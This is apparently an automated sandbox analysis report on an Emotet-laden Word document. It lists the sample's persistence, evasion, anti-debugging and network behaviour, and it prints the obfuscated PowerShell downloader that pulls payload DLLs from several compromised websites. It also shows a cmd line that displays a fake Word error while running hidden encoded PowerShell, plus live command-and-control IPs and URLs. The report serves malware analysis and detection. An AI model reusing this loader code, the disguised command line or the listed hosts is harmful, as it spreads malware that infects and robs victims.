Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx 7_2_0042E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046068C push 004606B8h; ret 7_2_004606B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx 7_2_0042E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428748 push 00428774h; ret 7_2_0042876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx 7_2_0042E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D754 push 0042D7ADh; ret 7_2_0042D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004607E4 push 00460827h; ret 7_2_0046081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00428798 push 004287C4h; ret 7_2_004287BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004637A8 push 004637E0h; ret 7_2_004637D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00463848 push 00463874h; ret 7_2_0046386C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046086C push 00460898h; ret 7_2_00460890

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Unxqf\ouoi.jab:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 552 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00401D4D mov eax, dword ptr fs:[00000030h] 7_2_00401D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001612C1 mov eax, dword ptr fs:[00000030h] 7_2_001612C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00711D4D mov eax, dword ptr fs:[00000030h] 8_2_00711D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002612C1 mov eax, dword ptr fs:[00000030h] 8_2_002612C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341D4D mov eax, dword ptr fs:[00000030h] 9_2_00341D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F12C1 mov eax, dword ptr fs:[00000030h] 9_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00781D4D mov eax, dword ptr fs:[00000030h] 10_2_00781D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003C12C1 mov eax, dword ptr fs:[00000030h] 10_2_003C12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004312C1 mov eax, dword ptr fs:[00000030h] 11_2_004312C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B12C1 mov eax, dword ptr fs:[00000030h] 12_2_001B12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00761D4D mov eax, dword ptr fs:[00000030h] 13_2_00761D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F12C1 mov eax, dword ptr fs:[00000030h] 13_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00171D4D mov eax, dword ptr fs:[00000030h] 14_2_00171D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002712C1 mov eax, dword ptr fs:[00000030h] 14_2_002712C1
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 217.160.169.110 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.255.203.164 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 84.232.229.24 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Behavior Graph ID: 344339 Sample: Arch_2021_717-1562532.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100
[Behavior graph: WINWORD.EXE and cmd.exe start powershell.exe and msg.exe (cmd.exe flagged: Suspicious powershell command line found, Very long command line found, Encrypted powershell cmdline option found); powershell.exe contacts shannared.com (192.169.223.13, port 80, AS-26496-GO-DADDY-COM-LLCUS, United States), drops C:\Users\user\Kaktksw\An6othh\N49I.dll (PE32, "Powershell drops PE file") and starts rundll32.exe, which spawns a chain of further rundll32.exe processes, each flagged "Hides that the sample has been downloaded from the Internet (zone.identifier)".]

Contacted Public IPs

IP               Domain   Country        ASN    ASN Name                       Malicious
217.160.169.110  unknown  Germany        8560   ONEANDONE-ASBrauerstrasse48DE  true
51.255.203.164   unknown  France         16276  OVHFR                          true
84.232.229.24    unknown  Romania        8708   RCS-RDS73-75DrStaicoviciRO     true
192.169.223.13   unknown  United States  26496  AS-26496-GO-DADDY-COM-LLCUS    true

Contacted Domains

Name IP Active
shannared.com 192.169.223.13 true

Contacted URLs

Name                                                   Malicious  Antivirus Detection       Reputation
http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/  true       Avira URL Cloud: safe     unknown
http://shannared.com/content/lhALeS/                   true       Avira URL Cloud: malware  unknown